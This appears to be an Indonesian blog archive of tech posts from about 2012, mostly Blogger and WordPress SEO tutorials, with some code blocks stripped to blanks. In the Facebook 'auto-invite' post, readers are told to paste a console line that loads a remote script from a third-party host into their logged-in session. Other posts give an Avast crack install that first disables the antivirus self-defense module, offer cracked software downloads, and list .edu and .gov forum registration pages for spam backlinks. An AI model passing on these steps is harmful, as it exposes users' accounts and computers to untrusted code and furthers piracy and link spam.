Cara Membuat Navigasi Breadcrumbs Blogger Ultimate SEO


Breadcrumbs adalah Navigasi yang memudahkan visitor sekaligus SEO Friendly, Breadcrumbs ini terletak di atas postingan blog, yang menghiasi blog layaknya seperti di window explorer, ada navigasinya... tapi, bukan cuma ini kegunaannya, justru Google lebih memerhatikan blog yang mempunyai Breadcrumbs ini.

simak nih... penjelasan dari si mbah google :
"Breadcrumb adalah sebaris tautan internal pada bagian atas atau bawah laman yang memungkinkan pengunjung untuk menavigasi balik ke bagian sebelumnya atau ke laman dasar dengan cepat. Banyak breadcrumbs memiliki laman yang paling umum (biasanya laman dasar) sebagai tautan pertama dan paling kanan dan memuat bagian yang lebih spesifik keluar ke sisi kanan".

agak ngaco ya.. bahasa-ne banyak yang kaku... wew, itu mungkin gara2 di translate kali.. he... CMIW
jika ingin blog anda mejeng di pejwan, silahkan pasang widget breadcurumbs in

Ok. Follow Up tutorial ini gan:
  1. Sign in ke akun Blogspot Anda
  2. Pilih layout > Edit Html
  3. Backup/download template Anda sebelum melakukan perubahan.
  4. Beri tanda centang pada Expand the Widget Templates
  5. Cari kode kyak ini :
    <b:include data='top' name='status-message'/>
  6. copy kode dibawah ini tepat dibawah kode diatas :

    <b:include data='posts' name='breadcrumb'/>
  7. Lalu cari kode seperti ini :
    <b:includable id='main' var='top'>
  8. dan copy paste kode dibawah ini tepat diatasnya :

    <b:includable id='breadcrumb' var='posts'>
    <b:if cond='data:blog.homepageUrl == data:blog.url'>
    <!-- No breadcrumb on home page -->
    <b:else/>
    <b:if cond='data:blog.pageType == "item"'>
    <!-- breadcrumb for the post page -->
    <p class='breadcrumbs'>
    <span class='post-labels'>
    <a expr:href='data:blog.homepageUrl' rel='tag'>Home</a>
    <b:loop values='data:posts' var='post'>
    <b:if cond='data:post.labels'>
    <b:loop values='data:post.labels' var='label'>
    <b:if cond='data:label.isLast == "true"'> »
    <a expr:href='data:label.url' rel='tag'><data:label.name/></a>
    </b:if>
    </b:loop>
    <b:else/>
    »Unlabelled
    </b:if>
    » <span><data:post.title/></span>
    </b:loop>
    </span>
    </p>
    <b:else/>
    <b:if cond='data:blog.pageType == "archive"'>
    <!-- breadcrumb for the label archive page and search pages.. -->
    <p class='breadcrumbs'>
    <span class='post-labels'>
    <a expr:href='data:blog.homepageUrl'>Home</a> » Archives for <data:blog.pageName/>
    </span>
    </p>
    <b:else/>
    <b:if cond='data:blog.pageType == "index"'>
    <p class='breadcrumbs'>
    <span class='post-labels'>
    <b:if cond='data:blog.pageName == ""'>
    <a expr:href='data:blog.homepageUrl'>Home</a> » All posts
    <b:else/>
    <a expr:href='data:blog.homepageUrl'>Home</a> » Posts filed under <data:blog.pageName/>
    </b:if>
    </span>
    </p>
    </b:if>
    </b:if>
    </b:if>
    </b:if>
    </b:includable>
  9. dan terakhir, cari kode seperti ini :
    ]]></b:skin>
  10. Kemudian copy paste kode CSS dibawah ini diatas kode diatas :
    .breadcrumbs {
    padding:5px 5px 5px 0px;
    margin: 0px 0px 15px 0px;
    font-size:95%;
    line-height: 1.4em;
    border-bottom:3px double #e6e4e3;
    }

  11. Tekan tombol "Save/Simpan".
Tunggu dua-tiga hari sampai  mesin google mendeteksi breadcrumbs kita. dan taraa.. lihatlah di search engine, blog kita semakin bagus.. wew.. sekian dan terimakasih


Cheat Dragon Nest DN Patch Enabler 27 Agustus 2012

 langsung download dibawah ini :

hxxp://www.mediafire.com/download.php?wbwp00850nwk5gb

Cara pake:

1. [PENTING] Back Up SEMUA file dragon nest, baik itu folder game maupun file patch yang tambun (500mb+).
2. Letakkan file patch tambun dan file donlotan di dalam folder game.
3. Jalankan file donlotan, baca note yang muncul.
4. Kalo semua uda OK, klik install.

Jaminan keamanan:

1. Yang penting SEMUA file dragon nest udah di backup, ga ada yang perlu dikawatirkan.
2. Patcher TIDAK menyentuh file selain dibawah ini:
\Resource00.pak
\DNUpdater_18to20.exe
\DragonNest.exe
\Version.cfg
3. Berkas executable yang digunakan patcher hanya xdelta3.exe hxxp://code.google.com/p/xdelta/downloads/detail?name=xdelta3-3.0.4-x86-32.exe&can=2&q=

Limitasi:

1. Ga ada NPC baru, entah karena pake exe lama ato emang ntar donlot patch kecil waktu update resmi.
2. Quest2 baru = terputus dari server.
3. Resep item craft yang berbeda dengan patch saat ini (lv24) bisa bikin stuck.

N3


Auto-Invite Teman ke Grup di Facebook

 
 Auto Invite ini adalah javascript yang otomatis akan menambahkan teman ke Grup agan di facebook. Dengan sistem ini lebih memudahkan agan untuk membuat Rame Grupnya, dan yg pasti gk bakalan bikin keriting tangannya.

disini ane menggunakan browser Mozilla, dan ane sarankan agan juga pake Mozilla Firefox.
  • Pertama login ke Facebok
  • Masuk ke Group yang Anda buat !!
  • Tekan tombol CTRL + SHIFT + K pada keyboard Anda
  • Copy & paste code di bawah ini : 
document.body.appendChild(document.createElement('script')).src='http://medlayerz.16mb.com/undang.js';
  • Lalu tekan Enter, tunggu sampai selesai


5 Aplikasi untuk Memproteksi Akun Facebook

Aplikasi Facebook kini semakin canggih, dan juga crime / kriminalitas hacking semakin meningkat tajam, berjuta juta akun telah dibobol hacker tak bertanggung jawab. Oleh karena itu facebook kini bekerja sama dengan beberapa perusahaan antivirus ternama untuk memproteksi akun facebook pengguna. disamping ini ada sebagian aplikasi yang bagus untuk dipakai dan juga berguna untuk memproteksi akun facebook kita.

  • McAfee social Protection
baru-baru ini McAfee memberikan proteksi terhadap kiriman dari pengguna facebook, menganalisis phising, malware, dll
  • Norton Safe Web
Aplikasi Norton Safe Web untuk Facebook ini menyediakan fitur Auto-Scan yang fungsinya untuk otomatis memindai/men-scan URL yang berada di news feed tanpa harus membuka aplikasi Norton Safe Web, dan hasilnya akan di update sebagai status Anda

  • BitDefender SafeGo
Aplikasi ini juga tidak berbeda jauh dengan  Aplikasi diatas, namun tidak hanya pengguna Facebook, pengguna Twitterpun bisa ikut menikmati menggunakan aplikasi ini.

  • ESET Online Scanner
Aplikasi ini berguna untuk men-scanning komputer kita apabila komputer kita terkena malware karena ulah Keylogger, atau dari seranngan hacker

  • Protect.it
Aplikasi ini fungsinya untuk memproteksi akun kita dari link link pishing.



Facebook akan meluncurkan tombol baru "Wants"

Setelah IPO yang tidak berjalan begitu baik, para analis mengharapkan pengumuman posititf akan hadir dari Facebook berkaitan dengan produknya terutama tentang bagaimana Facebook bisa mendapatkan lebih banyak pemasukan dari jumlah penggunanya yang sangat besar.

Ketika Facebook meluncurkan tombol “Like”, dunia web menyambutnya dengan suka cita dan berbagai media pun memberitakannya. Tombol “Like” adalah kesuksesan besar bagi Facebook. Dan kini Facebook dirumorkan akan segera meluncurkan tombol “Want”. Pengembang web Tom Weddington menemukan kode di dalam web Facebook yang mengindikasikan sebuah tag untuk tombol “Want”, tidak lama kemudian Facebook menghilangkan kode tersebut dari SDK dan menonaktifkan tombol kode tersebut.

Diduga tombol “Want” ini akan digunakan oleh para pengguna untuk menandai hal yang mereka inginkan pada konten Facebook mereka, yang paling memungkinkan adalah menandai berbagai produk. Ini seperti daftar sesuatu yang ingin Anda miliki, sebuah daftar keinginan. Sebuah daftar yang mungkin bisa memberikan lebih banyak pemasukan bagi Facebook.

Informasi seperti ini sangat bernilai bagi perusahaan seperti Facebook. Dengan jenis data seperti ini, mereka bisa mengkoneksikan para pemilik merek dengan konsumen secara langsung. Dan hal seperti inilah seharusnya dilakukan Facebook. Menjadi sangat masuk akal, konsumen ingin mendapatkan apa yang mereka mau, pemilik merek terhubung secara langsung dengan selera konsumen untuk pembelian. Sebuah win-win solution.

Jika Google bisa mendapatkan data seperti ini dari permintaan pencarian, Facebook bisa mendapatkan pengguna mereka memberikannya pada Facebook. Satu hal yang bisa sangat baik dilakukan Facebook adalah membuat orang mau memberikan informasi berharga pada mereka. Dan ini adalah hal baik bagi Facebook untuk mendapatkan pemasukan atas layanan yang disediakan.

hxxpp://dailysocial.net/post/faceboo......gkatkan-aktivitas-social-commerce


Cara Membuat tombol Social Bookmark & Share di Blog dengan JQuery Nudging

Tombol Share, Social Bookmark ini bagi sebagian blogger diwajibkan, karena mampu mendapatkan backlink dari sebagian situs jejaring sosial. baclink itu diperoleh dari pengunjung yang menshare artikel kita ke berbagai jejaring sosial misalnya: Facebook, Twitter, etc.

Penerapan dari JQuery Nudging ini sebenarnya hanyalah effect bergoyang - goyang jika kita mensorot tombol-tombol dengan kursor. coba saja agan praktekan di bawah postingan blog ini. Bagi sebagian Blogger SEO, menerapkan Social Bookmark malah membuat Blognya menjadi berat untuk di Load, tapi tenang saja, Tombol Share JQuery Nudging ini lebih simpe,ringan,praktis untuk digunakan dan juga lebih SEO Friendly.

Bagi agan-agan yg mau pasang widget Tombol Social Bookmark & Share di Blog dengan JQuery Nudging, ikuti tutorial ini :

    Sebelum melangkah lebih jauh, ada baiknya agan Backup template dulu untuk berjaga-jaga bila ada error/ kesalahan pemasangan Tombol Share JQuery Nudging ini.  
  • Login di Blogger
  • Masuk ke Template > Edit Html
  • Centang pada Expand Widget Templates
  • Cari kode ]]>
  • Copy kode dibawah ini dan paste tepat dibawah kode  ]]>
  •  
    • Gunakan Ctrl+F agar pencarian lebih cepat, lalu cari kode ini pada template sobat. di atas kode tersebut akan ada kode seperti ini
    • Copy kode ini dibawah dan Paste-kan di atas Kode
    Share yoo..!
    
    
    
    
    Share to Facebook Share this post on twitter Bookmark Delicious Digg This Stumbleupon Reddit Yahoo Bookmark Furl-Diigo Google Bookmark Technorati Newsvine Tips Triks Blogger, Tutorial SEO, Info


    Yahoo Koprol Akan di Tutup 28 Agustus 2012

    Lama ga ngepost ini blog gara-gara lupa pake akun gmail yang mana : hammaer :D
    uda pada tau belom nih kabar yahoo koprol terbaru ? buat yang sering ngoprol mungkin udah ga asing dengan situs jejaring social lokal ini. banyak kenangan dikoprol :( . dulu pas zaman gue koprolan, komunitasnya rame banget, malah sempet ada kopdar segala dan itu asik :D
    nih langsung aja gue comot beritanya :)

    Sepertinya yahoo memang di landa krisis kali ya..banyak banget produk-produknya di tutup secara perlahan.ngga hanya produknya saja,tapi ribuan karyawan banyak yang dirumahkan.apakah ini menunjukkan bahwa Yahoo akan collapse?..

    Sepertinya terlalu cepat jika mengambil kesimpulan seperti itu.tapi memang pada kenyataannya banyak produk-produk yahoo di tutup.seperti halnya delicious,geocities,mybloglog,Yahoo publisher,dll.melihat dari pernyataan yahoo, bahwa mereka lebih fokus pada pendapatan sektor bisnis online seperti News, Finance, Sports, dan layanan surat elektronik Yahoo!Mail, yang paling banyak menjaring pengguna dan pengiklan.

    Pernyataan scott thompson (bos Yahoo!) menyatakan akan membawa kembali perusahaan ini ke puncak kejayaannya setelah pendapatannya menurun besar-besaran sepanjang tahun ini. Yahoo! berusaha mengembalikan citranya  sebagai perusahaan “media digital pertama”, namun hingga kini masih di bawah bayang-bayang Google.

    Yahoo! sepertinya akhir-akhir ini kualahan mengahadapi persaingan google yang semakin inovatif dengan produk-produk barunya.seperti Gplus dan Google Drive.tapi ada satu visi dan misi google yang belum kesampaian adalah ingin menggeser facebook dengan jejaring socialnya yaitu Google Plus.

    Yahoo! koprol merupakan situs jejaring social buatan anak negeri yang di akuisisi Yahoo! pada tanggal 10 mei 2010 akan segera di tutup per tanggal 28 agustus 2012.

    Berita ini saya dapatkan dari blog resmi-nya yahoo! Koprol di sini.

    Jadi,bagi anda yang masih menyimpan data disana segera backup.agar data-data anda masih bisa di gunakan pada layanan lainnya.


    Tutorial SEO on Page Easy WP SEO

    Tutorial SEO On Page ala Easy WP SEO manual adalah bocoran bagaimana plugin ini bekerja, sehingga anda dapat mengoptimalkan SEO tanpa harus menggunakan plugin. Dalam tutorial SEO ini ada point-point yang di beri score SEO diantanya:

      Judul
      1. Judul mengandung keyword
      2. Judul diawali dengan keyword
      3. Judul minimal mengandung 3 kata
      4. Judul maksimal mengandung 66 karakter
      Url/permalink
      1. url atau permalink mengandung keyword
      Meta descriptin dan meta keyword
      1. Meta description mengandung keyword
      2. Meta description diawali dengan keyword
      3. Maksimal meta description 160 karakter
      4. Meta keywords mengandung keyword
      Tag heading
      1. H1 tag heading mengandung keyword
      2. H1 tag heading di awali dengan keyword
      3. H2 tag heading mengandung keyword
      4. H3 tag heading mengandung keyword
      Isi content/postingan
      1. Isi postingan setidaknya minimal 300 kata
      2. Postingan memiliki densitas keyword antara 2.5%-5.5%
      3. Paragraph pertama terdiri dari 50-100 kata dan mengandung keyword
      4. Postingan setidaknya memiliki sebuah gambar dengan keyword sebagai ALTnya
      5. Setidaknya terdapat satu keyword yang deberi style bold (B)
      6. Setidaknya terdapat satu keyword yang deberi style italic (I)
      7. Setidaknya terdapat satu keyword yang deberi style underline (U)
      8. Terdapat keyword yang dijadikan sebuah anchor text yang berisi external link
      9. Terdapat keyword yang dijadikan sebuah anchor text yang berisi internal link
      10. Paragraph terakhir terdiri dari 50-100 kata dan mengandung keyword
        Cek keyword density di : keyworddensity.com



        Avast Internet Security 7.0.1426 valid till 2050 + License [Tested+Working]


        Avast Internet Security 7.0.1426 adalah seperangkat teknologi untuk memberikan tingkat perlindungan tertinggi pada virus komputer. Avast Internet Security 7.0.1426 mencakup antivirus avast, anti-sapam filter, firewall, dan masih banyak lagi.

        Dengan license sampai 2050 Database virus selalu diperbaharui oleh avast, Avast Internet Security 7.0.1426 menyediakan perlindungan komprehensif terhadap virus, spyware, spam, dan perlindungan firewall dengan tambahan teknologi Avast! SafeZone. Nah, Avast Internet Security 7.0.1426 ini telah disertakan dengan Aktivatornya masbro agar Avast Internet Security anda aktif hingga tahun 2050.


        fitur Avast Internet security :

        Key technologies:
        • core antivirus and antispyware
        • Protection against rootkits in real-time
        • Base avast! Community IQ
        • Study methods intruders in unprotected networks
        • Intelligent checker avast! Intelligent Scanner
        • Intelligent update virus databases
        • Auto / game mode
        • “Green” Computer
        • Shield the file system / e-mail
        • Web Shield
        • Shield P2P/mgnovennyh posts
        • Network Shield
        • Shield of Conduct
        • Shield Script
        • isolated environment avast! Sandbox
        • Automatic firewall
        • Anti-spam

        Cara Install :

        1. Install Avast Internet Security 7.0.1426 pilih mode Trial
        2. buka Avast Internet Security 7.0.1426 Final dan masuk ke “SETTINGS” – “Troubleshooting” dan hilangkan tanda centang “Enable self-defense module”
        3. Restart Komputer masuk safe mode (pencet f8 pas booting pilih safe mode)
        4. Instal crack nya, pada saat proses instalasi masukan password ZeNiX
        5. Reboot komputer kalian
        6. Buka Avast lalu Subscription lalu pilih insert License maka avast kalian valid sampai tahun 2050

        Download  Avast Internet Security 7.0.1426 valid till 2050 + License [Tested+Working]
        hXXp://www.mediafire.com/?dxrhco7daq8qycz


        Cara Mendapatkan Akun Chitika Gold - Upgrade Akun Chitika


        Mau Tau Cara Mendapatkan Akun Chitika Gold - Upgrade Akun Chitika hehehe...tenang aja tar ane share sob, cara upgrade akun chitika biar tahan banting :p
        Sekarang Chitika lagi sering banned akun sembarangan, apalagi akun2 abal2 yang ga jelas pasti langsung dihajar..nah salah satu solusi sekarang adalah dengan mengupgrade akun sobat tersebut, tar ane sambung lg :D


        Kumpulan List Edu & Gov Forum Profile Backlink Siap Tancap

        Langsung aja monggo dicicipin Edu & Gov Forum Profile Backlink Siap Tancap. Yang belum tau kehebatan backlink Edu / Gov silahkan googling ya :D
        Kumpulan List Edu & Gov Forum Profile Backlink Siap Tancap






        .EDU Profiles :
        http://honors.arizona.edu/forum http://oregonstate.edu/groups/osugaming/forums http://uta.edu/studentorgs/cgsa/forum http://ksdt.ucsd.edu/forum http://forum.portal.edu.ro http://djclub.ucsd.edu/forum http://www-rohan.sdsu.edu/acm/forum http://swin.edu.au/hosting/hairhousewarehouse/forum http://music.unt/edu/pianoresearch/discussion/profile http://studio47.aspc.pomona.edu/forum/profile.php?mode=register&sid=dc87fbe97016d1bce30118786d334afa http://marsgeo.astro.cornell.edu/cgi-bin/ikonboard//register.cgi http://lincolnchristian.edu/forum/index.php?PHPSESSID=4gggv8ilg4k3o2a29kmar5i5s7&action=register http://access4all.ewu.edu/forum/index.php?PHPSESSID=sokicp0e4m9l26abc74fava8l1&action=register http://www.dent.ohio-state.edu/ce/boards/efda/index.php?action=register http://anserver1.eprsl.wustl.edu/forum/register.aspx http://clubs.db.erau.edu/dbslavic/forum-phpbb2/profile.php?mode=register&sid=dad0f304df1b2a94f20321fc0bb0e7ea http://www.qub.buffalo.edu/forum/profile.php?mode=register&sid=4a54d8ebd3677d31c24854ee9897dcce http://hknpos.ecn.purdue.edu/hkn/myBB/member.php?action=register http://passport.missouri.edu/index.php?option=com_user&task=register&Itemid=169




        Ini yang Gov Forum Profile Backlink Siap Tancap







        .GOV Profiles :
         https://forums.uspsoig.gov/ucp.php?mode=register&sid=e25f36f15bcbbd109387c5f04055a9b http://www.aikencountysc.gov/forum/index.php?PHPSESSID=2f0fdf4776640d182a50d7747de7f207&action=register http://community.nicic.gov/user/CreateUser.aspx http://library.blogs.delaware.gov/2011/01/11/jacksonandsharp/ http://www.calepa.ca.gov/Forums/registration_rules.asp?FID=0 http://community.sba.gov/user/register?destination=community http://homelessness.samhsa.gov/default.aspx http://www.tn.primrose.wi.gov/townsquare/member.php?action=register http://flyp.library.florida.gov/user/register http://gio.wi.gov/Home/tabid/94/ctl/Register/Default.aspx http://www.rib.uscourts.gov/externalkb20/Register.aspx http://community.portal.ca.gov/blog/join.aspx http://nnlm.gov/moodle/login/signup.php


        Cara Membuat Syntax Highlighter di Blog ( Tampilan Notepad++ )

        Apa itu Syntax Highlighter, dan apa fungsinya??
        Syntax Highlighter merupakan suatu fitur dari text editor, khususnya editor source code, html, php atau bahasa pemrograman apapun sehingga berbeda dengan tulisan lain di sekitarnya. Fungsinya untuk memudahkan programmer dalam membaca dan menganalisa source code tersebut.
        Nah Buat Sobat yang sering posting source code pada Web/Blog, tentu fitur Syntax Highlighter akan sangat membantu agar source code yang kita posting mudah dibedakan sebagai source code dan tentunya lebih menarik bagi pengunjung.
        Syntax Highlighter sebenarnya tidak jauh beda dengan Blockquote, hanya saja Syntax Highlighter ini tampilannya membedakan dari tulisan yang lainnya, namuan Syntax Highlighter ini mempunyai kelebihan yaitu dengan adanya fitur-fitur yang didukung oleh jQuery.

        Oia ada juga fasilitas dari Syntax Highlighter ini, antara lain:
        1. Adanya fasilitas print untuk kode.
        2. Adanya fasilitas View Plain yaitu membuka barisan kode dalam popup windows.
        3. Adanya fasilitas Help untuk melihat bantuan.

        Untuk Memperjelas Lihatlah  dibawah ini:

        
         <data:blog.pageName/> | <data:blog.title/>
         <data:blog.pageTitle/>
         
         
         <data:blog.pageName/> | <data:blog.title/>
         
         
         <data:blog.pageName/> | <data:blog.title/>
         
         
        
        
        Bila Sobat berminat, berikut cara membuatnya:

        1. Login ke akun blogger sobat
        2. Masuk Rancangan/Layout
        3. Pilih Edit HTML
        4. Klik "Download Template Lengkap" (ini untuk memBackUp template sobat)
        5. Beri tanda centang "Expand Template Widget"
        6. Carilah kode
        7. Kalo sudah ketemu, copy paste kode berikut di bawah kode:  
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        8. Kemudian cari lagi kode ]]>
        9. Simpan Code CSS berikut diatas kode ]]>
        source : hxxp://kode-blogger.blogspot.com/2011/04/cara-membuat-syntax-highlighter-di-blog.html


        Blogger SEO : Manipulasi Meta Robot Blogspot

        Blogger SEO : Manipulasi Meta Robot Blogspot

        Bagian ini sebenarnya dasar banget tapi sangat penting. Google dan SE lain hanyalah robot yang membaca bahasa html blog kita. di sinilah peran Meta Name, Meta Description dan Meta Keyword sangat penting.
        mari kita modifikasi Meta code dari blogspot anda.
        Berikut langkah-langkahnya :
        1. Buka acc blogger kamu >> buka bagian blog yg akan di modifikasi >> klik template >> ubah HTML >> Lanjutkan

        2. cari kode berikut ini di html templatenya
        <data:blog.pageTitle/> 
        
        biasanya kode tersebut ada di bagian atas template baris ke 10 - 20, silahkan cari.

        3. setelah ketemu, delete kode tersebut dan ganti dengan kode berikut :
        
         <data:blog.pageName/> | <data:blog.title/>
         <data:blog.pageTitle/>
         
         
         <data:blog.pageName/> | <data:blog.title/>
         
         
         <data:blog.pageName/> | <data:blog.title/>
         
         
        
        
        Lalu rubah bagian Description, keyword, author sesuai dengan keinginan kamu. semakin lengkap description dan keyword akan semakin bagus. tapi maksimal sekitar 200 karakter.

        Setelah di ganti, lalu save.

        4. Periksa hasil kerja anda dengan Lihat tampilan homepage blog cloningan, terus ketik Ctrl U. maka akan terlihat kode javascriptnya.
        lihat sekitar baris ke 20an, maka jika pekerjaan anda benar akan berubah sesuai harapan anda
        Demo :
        hxxp://cobacloningxmlblog.blogspot.com/
        ketik ctrl U >> lihat baris ke 22 akan nampak :
        Percobaan
        
        
        
        
         
         
        
        Ok, teknik dasar pertama selesai.
        silahkan anda coba.


        Cara Membuat Rich Snippet di Wordpress - Rating Bintang di Google




        Membuat Rich Snippet di Wordpress - Rating Bintang di Google

        Rating Bintang di Google - ternyata dapat meningkatkan jumlah pengunjung ke blog kita lho sebenernya sih gw udah pake plugin kalo yang buat di wp cuman ini ada tutor untuk membuat rating blog tanpa plugin di wordpress, trus yang blogger gmn bisa ngga tuh ? untuk blogger bisa kok tapi caranya ada lagi sob, tar deh di bahas :D
        cekidot nih monggo dibaca >..<

        silahkan edit themes kamu, kalau melalu dasboard klik menu Appearance >> Editor

        Langkah 1
        Pastikan kamu sudah verifikasi blog kamu dengan google plus, untuk caranya sudah saya jelaskan pada postingan sebelumnya, pada bagian langkah 2 dan langkah 2 setelah sudah terintegrasi dengan google plus saatnya memasang kode rich snippetnya.

        Langkah 2
        buka file header.php
        Tambahkan kode dibawah ini setelah kode




        lalu simpan pekerjaan kamu/update file

        Langkah 3
        buka file footer.php
        tambahkan kode sebelum/diatas kode

        lalu simpan pekerjaan kamu/update file

        Langkah 4
        buka file single.php
        tambahkan kode dibawah ini setelah kode ini



        9

        out of 10 based on 10 rating.

        1 user review.

        lalu simpan pekerjaan kamu/update file


        Fenomena Booming Sekolah Bisnis Internet di Indonesia

        Mungkin sudah ngga aneh lagi ya buat para netter mendengar judul postingan gw, Mungkin Sobat2 smua sudah sering melihat iklan2 di web, forum, atau ditawari langsung untuk bergabung dengan sekolah bisnis internet baik dari yang white hat sampe yang blackhat. bermunculanlah forum2 berbayar yang menawarkan berbagai produk dan ciri khas dan tentunya membuat NGILER para pembaca atau yang ditawari hehehe...Sehingga Dengan Uang yang lumayan tidak sedikit sobat2 mau membayar demi masuk sekolah tersebut, Bahkan yang parah lagi ada yang sampe minjem duit ke orang lain tuh :D

        Udah masuk Forum/Sekolah Berbayar tapi ga ada hasil ?
        hehe..kalo sudah ada tutornya yang jelas ya dimana-mana pasti jawabannya ACTION ( baca di blognya noviku xixi ). Trus belom dapet apa2 udah ke pincut sama forum2 berbayar atau sekolah2 lain, hmm ga salah juga tapi gw cuma saranin hati2 aja dalam memilih forum2 tersebut, Gw ada beberapa tips kalo kurang tambahin aje ye hehe :D

        Tips memilih Sekolah Bisnis Online   :
        1. Lihat Status Forum Tersebut. ( Tampilan, Kata2, Materi yang di tawarkan fresh atau  Cloningan atau bagaimanakah ? Jangan mudah terpercaya dengan screenshut apalagi screenshut orang lain :p.)

        2. Lihat siapa pendirinya punya facebooknya lebih baik, hati2 jika anda menemukan forum yang pendirinya suka sembunyi atau ga mau bagi2 kontak udah ketahuan banget ya :D, Kalo udah ketemu silahkan selidiki dan  baca aja status2 nya dan juga status temen2 dan siapa aja temenya, dalam tahap ini sobat sudah bisa menilai  bagaimana KALIBER pemimpin sekolah tersebut bisa Bertanggung jawab membimbing member2nya atau cuma menjual sofwer or plugin2 aja.

        3. Lihat Kesuksesan dan kesolidan membernya, Testimoni yang dibuat-buat sama testimoni yang real memang agak susah di bedain hehe..lagi-lagi jangan mudah percaya apalagi yang pake testimoni orang lain secara terang terangan xixixi....menjauhlah menjauhlah sobat...

        Bisnis Mendirikan Forum Berbayar emang lagi booming jadi ga menutup kemungkinan banyak orang2 yang cuma modal skill pas2an dan tanpa kesiapan yang matang membuat forum tandingan demi meraup untung dari member2 nya, gw ga bilang semua forum berbayar itu NIPU malah gw bilang ada forum yang emang bener2 mengurus membernya dan ada juga forum2 yang asal2an.. so baca tulisan gw
        HATI HATI MEMILIH FORUM BERBAYAR !
        jangan sampe anda seperti di gambar ini..Berapa banyak orang yang Rela Bayar Mahal Demi Membeli Tai xixi






        Hati-hati Menginstal atau Mendownload Plugin dan template WP

        [ WARNING ] hehe..judulnya re.. Hati-hati Menginstal atau Mendownload Plugin dan template WP, ada apa sih ? hmm..sekedar share beberapa pengalaman gw dan temen2 gw yang emang para gratiser xixixi...
        jadi gini sob selama penjelajahan gw banyak nemuin plugin dan theme2 gratisan ( nulled ) yang didalemnya ternyata udah di INJECT kan script / malware.
        Emang Inject atau malware tersebut pengaruhnya apa gt sob ?
        Banyak bro intinya ya merugikan orang yang download dan make sekaligus menguntungkan orang yang sudah nginject script itu. ada yang bisa jebol informasi web sobat ada juga yang nyolong traffic web sobat.

        Enak ya xixixi... cari theme atau plugin yang lagi ngetrend trus di modif and inject trus upload tinggal nyebarin link di forum2 banyak yang donload banyak yang make situs kita bisa kebanjiran trefik deh. Ada yang mau caranya ? jangan ah sob dosa, kan kasian orang yang develove webnya cape2 ternyata kita nikmatin hasilnya xixixi.. 

        Dan canggihnya theme dan plugin inject 2012 ini walaupun udah discan di totalvirus ga ada malware yang terdeteksi, jadi hati2 ya sob. Trus cara menghindarinya gimana ? Nih gw kasih langkah2nya :D

        1. Jangan mudah mendownload theme ataupun plugin di tempat yang belum terpercaya.Sekalipun disitus terpercaya liat status orang yang upload kalo newbi yang upload hati2 ye, kalo mastah2 yang upload? Scan lagi ye ampe 2 kali.
        2. jangan nyoba2 download dan nginstal theme or plugin yang belum pernah dicoba work apa ngga nya. Kecuali jika sobat mau jadi orang yang berbaik hati ngetest plugin2 tersebut :D



        konser avenged sevenfold di jakarta 2012

        konser avenged sevenfold jakarta 2012 - Mungkin ini yang keduakalinya buat band Avenged sevenfold konser di indonesia. seneng rasanya kalo band amerika yang satu ini manggung setelah taun 2008 lalu sempet konser di indonesia akhirnya 2012 avenged sevenfold bisa konser lagi di indonesia, tapi kira2 berapa ya harga tiket konser avenged sevenfold ? ada yang tau ga nih sobat ? pengen nonton euy :D
        yang ngerasa sevenfoldism sejati harus nonton neh..kapan lagi coba :D
        yang tau harga tiket konser avenged sevenfold bisikin ya dimari :D


        Download Winrar Crystal 2010 full Mediafire

        Download Winrar Crystal 2010 full Mediafire
        Udah paada tau kan gunanya software yang satu ini..yang ga tau DL..
        nih langsung aja silahkan disedot sopwernya ya
         Download Winrar Crystal 2010 full Mediafire
        No Password :


        L’Arc-en-Ciel World Tour 2012

        L’Arc-en-Ciel World Tour 2012 Jakarta, mantep nih salah satu band favorite gw.. mudah-mudahan bisa nonton L’Arc-en-Ciel World Tour 2012.  :D


        Cara Menonaktifkan Facebook Timeline

        Ternyata banyak facebooker yang kurang suka dengan tampilan Facebook Timeline yang baru mungkin karena tampilannya terlalu vulgar sehingga privasi kegiatan kita akan terlihat detile oleh teman2 di fb, mungkin juga tampilannya yang agak gimana gitu ( susah jelasinnya hihi padahalmah ga bisa jelasin :p ). Lalu bagaimana sih Cara Menonaktifkan Facebook Timeline dan mengembalikan tampilan facebook kita ketampilan FB yang lama ?
        Sebenernya tampilan facebook timeline adalah program langsung dari facebook pusat dan ngga bisa di nonaktifkan karena semua user facebook pada saatnya nanti akan terupgrade sendiri ke facebook timeline. Sebenernya juga bisa aja facebook timeline ini di nonaktifkan dengan syarat semua facebooker harsu demo di kantornya mark zuberg noh bawa sepanduk yang gede wkwk..: upss ngaco.

        Oke kembali ke topik, Cara Menonaktifkan Facebook Timeline yang beredar di dunia maya sekarang ini hanyalah mengubah tampilan cuma di komputer kita aja sedangkan teman2 kita yang buka tetap melihat facebook kita menggunakan facebook timeline. mau yang gituan ? kalo mau sih ga apa2 sini ta bisikin caranya :D
        Ada dua cara tapi konsepnya sama aja dengan menggunakan ekstensi semacam plugin nah yang pake plugin langsung aja cekidot ke sini www.timelineremove.com sedangkan yang satunya lagi dengan memakai add onn mozillafirefox ( berarti tampilan facebook lamanya cuma bisa di firefox di komputer km aja sob )
        nama addons nya : user agent switcher cari aja tuh :p
        o iya tampilan facebook akan terlihat lama bila menggunakan browser internet explorer 7 jadi kalo mau tampilan facebook yang lama bukanya di explorer aja xixixi...


        Cara Mencari Domain Berumur ( AGED ber PR ) Di Godaddy Dengan Harga Murah

        Sebenernya postingan ini gw sengaja bookmark di blog ini karena gw juga mau praktekin kan daripada susah2 nyari2 lagi hehe..langung aja mudah2an bermanfaat..
        Kali ini saya ingin menjelaskan cara mencari domain berumur (aged) dengan harga gag mahal2 amat sih :lol:

        Terus kenapa pilih domain Aged? kan kalo domain baru bisa sesuai keinginan kita nama domainnya?

        Yah, ada beberapa kelebihan domain aged ( menurut saya / maaf kalo salah ) :
        1. Domain aged index nya lebih cepet ( tapi ada juga yg gag :p )
        2. Domain aged lebih awet kalo dibikin autoblog atau AGC ( pengalaman ane / kalo yg lain ya gag tau :p )
        3. Dengan domain aged autoblog bisa di backdate ( jadi blog baru pun bisa keliatan blog udah lama :p )
        4. Beberapa domain aged sudah ada backlink atau bahkan PR nya.
        5. Apalagi ya...mungkin mastah2 ada yg mau menambahkan.
        6. Backlink yg baru lebih cepat nancep-nya :D (gak perlu ragu kalo mo bombardir backlink :D ( tambahan dari mastah FayLa DISINI )
        7. +bisa langsung bom2an backlink tanpa perlu khawatir, krn trust google pada aged domain pasti jauh lbh bsar dibanding domain yang masih hangat :lol:
        Ok sekarang masuk ke langkah2 di GD nya :

        1. Login godaddy dan masuk halaman auctions ( disini : hxxps://auctions.godaddy.com/ )
